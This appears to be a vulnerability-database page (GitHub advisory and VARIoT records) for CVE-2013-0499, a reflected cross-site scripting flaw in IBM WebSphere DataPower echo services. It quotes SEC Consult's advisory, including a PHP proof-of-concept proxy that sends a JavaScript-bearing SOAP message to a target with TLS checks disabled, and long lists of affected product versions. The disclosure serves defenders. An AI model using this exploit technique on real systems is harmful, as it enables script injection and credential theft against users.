{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi52_firmware:4.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"A592E7D9-B5B8-45DD-AAF0-E380F7511AA4\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi52_firmware:4.0.1:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"A570957F-5B26-46FD-B51B-E90C96EB4168\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi52_firmware:4.0.2:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"04EFE5AD-4652-4254-8AE9-D06F3453A808\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi52_firmware:5.0.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"AD176549-564F-49E8-9FDA-F4C263E5817F\"}]},{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:h:ibm:websphere_datapower_integration_appliance_xi52:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"137D5F48-9118-4C2D-941A-8AEB48567443\"}]}]},{\"operator\":\"AND\",\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi50_firmware:3.8.2:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"AB95DC9D-D74B-45E1-AFB0-80F7A1F46FA9\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi50_firmware:4.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"0833251B-E8A5-4E4A-B7CC-700E205509FE\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi50_firmware:4.0.1:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"DD789CDF-5F99-4FD3-ADE2-36297310EADA\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi50_firmware:4.0.2:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"CF02EAA9-1CDA-4C8C-AF34-E133AA3497D5\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi50_firmware:5.0.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"2E6B0888-C558-48EF-9C1B-4E169ECC70AD\"}]},{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:h:ibm:websphere_datapower_integration_appliance_xi50:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"2EBB66F8-B497-404C-813A-A40E853054D6\"}]}]},{\"operator\":\"AND\",\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:ibm:websphere_datapower_b2b_appliance_xb62_firmware:3.8.2:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"357A5629-DF00-483B-BD8F-CCD05CF8CFA8\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:ibm:websphere_datapower_b2b_appliance_xb62_firmware:4.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"122283E7-E514-4ED7-9529-A75CF236855B\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:ibm:websphere_datapower_b2b_appliance_xb62_firmware:4.0.1:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"716DBA1D-16EE-4E87-BA6B-A444981392BB\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:ibm:websphere_datapower_b2b_appliance_xb62_firmware:4.0.2:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"513606F6-9E5C-45E9-86AE-332F1EDC06D3\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:ibm:websphere_datapower_b2b_appliance_xb62_firmware:5.0.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"390A7634-FDD9-4FB9-8641-31AB41168E85\"}]},{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:h:ibm:websphere_datapower_b2b_appliance_xb62:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"5257F9FA-F807-4D15-BF7C-8A9531619A50\"}]}]}],\"references\":[{\"url\":\"http://seclists.org/bugtraq/2013/May/83\",\"source\":\"psirt@us.ibm.com\",\"tags\":[\"Exploit\"]},{\"url\":\"http://www-01.ibm.com/support/docview.wss?uid=swg21637717\",\"source\":\"psirt@us.ibm.com\",\"tags\":[\"Vendor Advisory\"]},{\"url\":\"https://exchange.xforce.ibmcloud.com/vulnerabilities/82221\",\"source\":\"psirt@us.ibm.com\"},{\"url\":\"https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20130523-0_IBM_Xi50_Echo-WebService_Xss_in_Xml_v10.txt\",\"source\":\"psirt@us.ibm.com\",\"tags\":[\"Exploit\"]},{\"url\":\"http://seclists.org/bugtraq/2013/May/83\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\"]},{\"url\":\"http://www-01.ibm.com/support/docview.wss?uid=swg21637717\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Vendor Advisory\"]},{\"url\":\"https://exchange.xforce.ibmcloud.com/vulnerabilities/82221\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20130523-0_IBM_Xi50_Echo-WebService_Xss_in_Xml_v10.txt\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\"]}]}}"
  }
}

GHSA-R4RQ-634F-573C

Vulnerability from github – Published: 2022-05-05 02:49 – Updated: 2022-05-05 02:49

Details

Show details on source website

JSON

To clipboard

{
  "affected": [],
  "aliases": [
    "CVE-2013-0499"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2013-05-28T16:55:00Z",
    "severity": "MODERATE"
  },
  "details": "Cross-site scripting (XSS) vulnerability in the echo functionality on IBM WebSphere DataPower SOA appliances with firmware 3.8.2, 4.0, 4.0.1, 4.0.2, and 5.0.0 allows remote attackers to inject arbitrary web script or HTML via a SOAP message, as demonstrated by the XML Firewall, Multi Protocol Gateway (MPGW), Web Service Proxy, and Web Token services.",
  "id": "GHSA-r4rq-634f-573c",
  "modified": "2022-05-05T02:49:11Z",
  "published": "2022-05-05T02:49:11Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2013-0499"
    },
    {
      "type": "WEB",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/82221"
    },
    {
      "type": "WEB",
      "url": "https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20130523-0_IBM_Xi50_Echo-WebService_Xss_in_Xml_v10.txt"
    },
    {
      "type": "WEB",
      "url": "http://seclists.org/bugtraq/2013/May/83"
    },
    {
      "type": "WEB",
      "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21637717"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

VAR-201305-0236

Vulnerability from variot - Updated: 2023-12-18 12:58

Cross-site scripting (XSS) vulnerability in the echo functionality on IBM WebSphere DataPower SOA appliances with firmware 3.8.2, 4.0, 4.0.1, 4.0.2, and 5.0.0 allows remote attackers to inject arbitrary web script or HTML via a SOAP message, as demonstrated by the XML Firewall, Multi Protocol Gateway (MPGW), Web Service Proxy, and Web Token services. WebSphere DataPower SOA Appliances are prone to a cross-site scripting vulnerability. An attacker may leverage this issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. IBM WebSphere DataPower SOA Appliances is a set of network equipment of IBM Corporation in the United States. The appliance is primarily used to simplify, secure and accelerate XML and Web services deployment in SOA. SEC Consult Vulnerability Lab Security Advisory < 20130523-0 > ======================================================================= title: JavaScript Execution in WebSphere DataPower Services product: IBM WebSphere DataPower Integration Appliance XI50 vulnerable version: 3.8.2, 4.0, 4.0.1, 4.0.2, 5.0.0 fixed version: not available, config changes CVE number: CVE-2013-0499 impact: Low/Medium homepage: https://www.ibm.com/ found: 2013-01-28 by: A. Falkenberg SEC Consult Vulnerability Lab https://www.sec-consult.com =======================================================================

Vendor/product description:

WebSphere® DataPower® appliances simplify, govern, and optimize the delivery of services and applications and enhance the security of XML and IT services. They extend the capabilities of an infrastructure by providing a multitude of functions. URL: http://www-03.ibm.com/software/products/us/en/datapower/

Vulnerability overview/description:

For the purposes of debugging, DataPower provides configuration options to echo requests received from the client. For example, XML Firewall service can be configured to echo requests by choosing the backend as 'loopback'. Other services like Multi Protocol Gateway and Web Service Proxy can be configured to echo requests by setting the variable “var://service/mpgw/skip-backside” in its processing policy. In such configurations, the requests are not sent to a backend server. Without adequate validation and processing, the requests may be echoed back to the client. Loopback services that blindly echo requests should only be used for debugging purposes and not intended to be run in production environments as they can result in potential security threats. For example, if an arbitrary JavaScript embedded request is sent to such services, they will simply echo it back resulting in a potential JavaScript execution vulnerability in the client's browser. URL: https://www-304.ibm.com/support/docview.wss?uid=swg21637717

Proof of concept:

The proof of concept was tested on an IBM Xi50 with the backend configured as a "loopback" Web Service. Any valid SOAP message sent to the Web service is returned unmodified to the receiver. If the SOAP response of the "loopback" Web Service is parsed by a browser, any JavaScript that is contained within the XML document will get executed. The following PHP script demonstrates a reflected cross site scripting.

alert("XML XSS"); ';

if(isset($_POST['soapMessage']) and isset($_POST['soapUrl'])){ $soap_do = curl_init(); curl_setopt($soap_do, CURLOPT_URL, $_POST['soapUrl'] );
curl_setopt($soap_do, CURLOPT_CONNECTTIMEOUT, 10); curl_setopt($soap_do, CURLOPT_TIMEOUT, 10); curl_setopt($soap_do, CURLOPT_RETURNTRANSFER, true ); curl_setopt($soap_do, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($soap_do, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($soap_do, CURLOPT_POST, true ); curl_setopt($soap_do, CURLOPT_POSTFIELDS, $_POST['soapMessage']); curl_setopt($soap_do, CURLOPT_HTTPHEADER, array('Content-Type: text/xml; charset=utf-8', 'Content-Length: '.strlen($_POST['soapMessage']) ));

$result = curl_exec($soap_do);
$err = curl_error($soap_do);

    header('Content-type: text/xml');
echo $result;
    exit;

} ?>

XSS XML Proxy

SOAP Endpoint:
SOAP Message:

Vulnerable / tested versions:

SEC Consult verified the vulnerability in the WebSphere DataPower Appliance XI50. The vendor provided an extended list of vulnerable versions: WebSphere DataPower 3.8.2, 4.0, 4.0.1, 4.0.2, 5.0.0.

Vendor contact timeline:

2013-01-30: Sending advisory and proof of concept exploit via encrypted channel. 2013-01-31: Vendor confirms receipt 2013-05-17: Vendor posts security bulletin 2013-05-23: SEC Consult releases coordinated security advisory.

Solution:

The vendor does not offer a patch.

The vulnerability can be prevented by disabling the services to blindly echo requests back. A detailed description can be found on the vendor's site: https://www-304.ibm.com/support/docview.wss?uid=swg21637717

Advisory URL:

https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Unternehmensberatung GmbH

Office Vienna Mooslackengasse 17 A-1190 Vienna Austria

Tel.: +43 / 1 / 890 30 43 - 0 Fax.: +43 / 1 / 890 30 43 - 25 Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult

EOF A. Falkenberg / @2013

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201305-0236",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "websphere datapower service gateway xg45 virtual edition",
        "scope": "eq",
        "trust": 1.8,
        "vendor": "ibm",
        "version": "3.8.2"
      },
      {
        "model": "websphere datapower service gateway xg45 virtual edition",
        "scope": "eq",
        "trust": 1.8,
        "vendor": "ibm",
        "version": "4.0"
      },
      {
        "model": "websphere datapower service gateway xg45 virtual edition",
        "scope": "eq",
        "trust": 1.8,
        "vendor": "ibm",
        "version": "4.0.1"
      },
      {
        "model": "websphere datapower service gateway xg45 virtual edition",
        "scope": "eq",
        "trust": 1.8,
        "vendor": "ibm",
        "version": "4.0.2"
      },
      {
        "model": "websphere datapower service gateway xg45 virtual edition",
        "scope": "eq",
        "trust": 1.8,
        "vendor": "ibm",
        "version": "5.0.0"
      },
      {
        "model": "websphere datapower service gateway xg45",
        "scope": "eq",
        "trust": 1.8,
        "vendor": "ibm",
        "version": "3.8.2"
      },
      {
        "model": "websphere datapower service gateway xg45",
        "scope": "eq",
        "trust": 1.8,
        "vendor": "ibm",
        "version": "4.0"
      },
      {
        "model": "websphere datapower service gateway xg45",
        "scope": "eq",
        "trust": 1.8,
        "vendor": "ibm",
        "version": "4.0.1"
      },
      {
        "model": "websphere datapower service gateway xg45",
        "scope": "eq",
        "trust": 1.8,
        "vendor": "ibm",
        "version": "4.0.2"
      },
      {
        "model": "websphere datapower service gateway xg45",
        "scope": "eq",
        "trust": 1.8,
        "vendor": "ibm",
        "version": "5.0.0"
      },
      {
        "model": "websphere datapower b2b appliance xb62",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "ibm",
        "version": "4.0.2"
      },
      {
        "model": "websphere datapower integration appliance xi50",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "ibm",
        "version": "5.0.0"
      },
      {
        "model": "websphere datapower b2b appliance xb62",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "ibm",
        "version": "4.0.1"
      },
      {
        "model": "websphere datapower b2b appliance xb62",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "ibm",
        "version": "4.0"
      },
      {
        "model": "websphere datapower integration appliance xi50",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "ibm",
        "version": "4.0.2"
      },
      {
        "model": "websphere datapower integration appliance xi50",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "ibm",
        "version": "4.0.1"
      },
      {
        "model": "websphere datapower integration appliance xi50",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "ibm",
        "version": "4.0"
      },
      {
        "model": "websphere datapower b2b appliance xb62",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "ibm",
        "version": "5.0.0"
      },
      {
        "model": "websphere datapower b2b appliance xb62",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "ibm",
        "version": "3.8.2"
      },
      {
        "model": "websphere datapower integration appliance xi50",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "ibm",
        "version": "3.8.2"
      },
      {
        "model": "websphere datapower integration appliance xi52",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "ibm",
        "version": "4.0"
      },
      {
        "model": "websphere datapower xc10 appliance",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "ibm",
        "version": "5.0.0"
      },
      {
        "model": "websphere datapower xc10 appliance",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "ibm",
        "version": "4.0.2"
      },
      {
        "model": "websphere datapower xc10 appliance",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "ibm",
        "version": "4.0.1"
      },
      {
        "model": "websphere datapower xc10 appliance",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "websphere datapower service gateway xg45",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "websphere datapower xc10 appliance",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "ibm",
        "version": "4.0"
      },
      {
        "model": "websphere datapower integration appliance xi52",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "websphere datapower b2b appliance xb62",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "websphere datapower integration appliance xi52 virtual edition",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "ibm",
        "version": "3.8.2"
      },
      {
        "model": "websphere datapower integration appliance xi52",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "ibm",
        "version": "3.8.2"
      },
      {
        "model": "websphere datapower integration appliance xi52 virtual edition",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "websphere datapower integration appliance xi52 virtual edition",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "ibm",
        "version": "5.0.0"
      },
      {
        "model": "websphere datapower integration appliance xi52",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "ibm",
        "version": "5.0.0"
      },
      {
        "model": "websphere datapower integration appliance xi52 virtual edition",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "ibm",
        "version": "4.0.2"
      },
      {
        "model": "websphere datapower integration appliance xi50",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "websphere datapower xc10 appliance",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "ibm",
        "version": "3.8.2"
      },
      {
        "model": "websphere datapower integration appliance xi52",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "ibm",
        "version": "4.0.2"
      },
      {
        "model": "websphere datapower service gateway xg45 virtual edition",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "websphere datapower integration appliance xi52 virtual edition",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "ibm",
        "version": "4.0.1"
      },
      {
        "model": "websphere datapower integration appliance xi52 virtual edition",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "ibm",
        "version": "4.0"
      },
      {
        "model": "websphere datapower integration appliance xi52",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "ibm",
        "version": "4.0.1"
      },
      {
        "model": "websphere datapower b2b the appliance xb62",
        "scope": null,
        "trust": 0.8,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "websphere datapower b2b the appliance xb62",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "ibm",
        "version": "3.8.2"
      },
      {
        "model": "websphere datapower b2b the appliance xb62",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "ibm",
        "version": "4.0"
      },
      {
        "model": "websphere datapower b2b the appliance xb62",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "ibm",
        "version": "4.0.1"
      },
      {
        "model": "websphere datapower b2b the appliance xb62",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "ibm",
        "version": "4.0.2"
      },
      {
        "model": "websphere datapower b2b the appliance xb62",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "ibm",
        "version": "5.0.0"
      },
      {
        "model": "websphere datapower integration the appliance xi50",
        "scope": null,
        "trust": 0.8,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "websphere datapower integration the appliance xi50",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "ibm",
        "version": "3.8.2"
      },
      {
        "model": "websphere datapower integration the appliance xi50",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "ibm",
        "version": "4.0"
      },
      {
        "model": "websphere datapower integration the appliance xi50",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "ibm",
        "version": "4.0.1"
      },
      {
        "model": "websphere datapower integration the appliance xi50",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "ibm",
        "version": "4.0.2"
      },
      {
        "model": "websphere datapower integration the appliance xi50",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "ibm",
        "version": "5.0.0"
      },
      {
        "model": "websphere datapower integration the appliance xi52",
        "scope": null,
        "trust": 0.8,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "websphere datapower integration the appliance xi52 virtual edition",
        "scope": null,
        "trust": 0.8,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "websphere datapower integration the appliance xi52 virtual edition",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "ibm",
        "version": "3.8.2"
      },
      {
        "model": "websphere datapower integration the appliance xi52 virtual edition",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "ibm",
        "version": "4.0"
      },
      {
        "model": "websphere datapower integration the appliance xi52 virtual edition",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "ibm",
        "version": "4.0.1"
      },
      {
        "model": "websphere datapower integration the appliance xi52 virtual edition",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "ibm",
        "version": "4.0.2"
      },
      {
        "model": "websphere datapower integration the appliance xi52 virtual edition",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "ibm",
        "version": "5.0.0"
      },
      {
        "model": "websphere datapower integration the appliance xi52",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "ibm",
        "version": "3.8.2"
      },
      {
        "model": "websphere datapower integration the appliance xi52",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "ibm",
        "version": "4.0"
      },
      {
        "model": "websphere datapower integration the appliance xi52",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "ibm",
        "version": "4.0.1"
      },
      {
        "model": "websphere datapower integration the appliance xi52",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "ibm",
        "version": "4.0.2"
      },
      {
        "model": "websphere datapower integration the appliance xi52",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "ibm",
        "version": "5.0.0"
      },
      {
        "model": "websphere datapower service gateway xg45",
        "scope": null,
        "trust": 0.8,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "websphere datapower service gateway xg45 virtual edition",
        "scope": null,
        "trust": 0.8,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "websphere datapower xc10 the appliance",
        "scope": null,
        "trust": 0.8,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "websphere datapower xc10 the appliance",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "ibm",
        "version": "3.8.2"
      },
      {
        "model": "websphere datapower xc10 the appliance",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "ibm",
        "version": "4.0"
      },
      {
        "model": "websphere datapower xc10 the appliance",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "ibm",
        "version": "4.0.1"
      },
      {
        "model": "websphere datapower xc10 the appliance",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "ibm",
        "version": "4.0.2"
      },
      {
        "model": "websphere datapower xc10 the appliance",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "ibm",
        "version": "5.0.0"
      },
      {
        "model": "websphere datapower soa appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.0.2"
      },
      {
        "model": "websphere datapower soa appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.0.1"
      },
      {
        "model": "websphere datapower soa appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.8.2"
      },
      {
        "model": "websphere datapower soa appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.0"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "60027"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-002845"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-0499"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201305-593"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_xc10_appliance_firmware:3.8.2:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_xc10_appliance_firmware:4.0:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_xc10_appliance_firmware:4.0.1:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_xc10_appliance_firmware:4.0.2:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_xc10_appliance_firmware:5.0.0:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:ibm:websphere_datapower_xc10_appliance:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_service_gateway_xg45_virtual_edition_firmware:5.0.0:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_service_gateway_xg45_virtual_edition_firmware:4.0.1:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_service_gateway_xg45_virtual_edition_firmware:4.0.2:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_service_gateway_xg45_virtual_edition_firmware:3.8.2:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_service_gateway_xg45_virtual_edition_firmware:4.0:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:ibm:websphere_datapower_service_gateway_xg45_virtual_edition:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_service_gateway_xg45_firmware:5.0.0:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_service_gateway_xg45_firmware:3.8.2:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_service_gateway_xg45_firmware:4.0.1:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_service_gateway_xg45_firmware:4.0.2:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_service_gateway_xg45_firmware:4.0:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:ibm:websphere_datapower_service_gateway_xg45:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
